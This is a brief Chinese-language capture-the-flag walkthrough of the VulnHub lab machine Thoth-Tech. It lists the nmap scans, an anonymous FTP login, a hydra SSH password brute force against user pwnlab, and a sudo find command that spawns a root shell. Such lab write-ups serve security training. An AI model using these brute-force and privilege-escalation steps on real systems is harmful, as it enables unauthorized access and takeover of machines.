vulnhub靶机Thoth-Tech

下载地址：https://download.vulnhub.com/thothtech/Thoth-Tech.ova

主机发现

arp-scan -l

目标：192.168.21.148

端口扫描

nmap --min-rate 10000 -p- 192.168.21.148

服务扫描

nmap -sV -sT -O -p21,22,80 192.168.21.148

漏洞扫描

nmap --script=vuln -p21,22,80 192.168.21.148

先去看web网站

在f12里面发现

再去看看web的别的

感觉少了点东西于是又扫了一遍

nmap -A 192.168.21.148

发现ftp能匿名登入

去看看（用户名anonymous）

ftp 192.168.21.148

这里告诉我们pwnlab能爆破

hydra -l pwnlab -P /usr/share/wordlists/rockyou.txt ssh://192.168.21.148

ssh登入

ssh pwnlab@192.168.21.148

第一个flag

信息收集

10和11是我执行的发现有find

这里用find找可执行的文件

find / -user root -perm /40000 2>/dev/null

没有东西

再看看sudo

find没有密码要求，那么就需要利用这个来提权了

find 命令提权 - 编程猎人 (programminghunter.com)

sudo find . -exec /bin/sh \; -quit

结束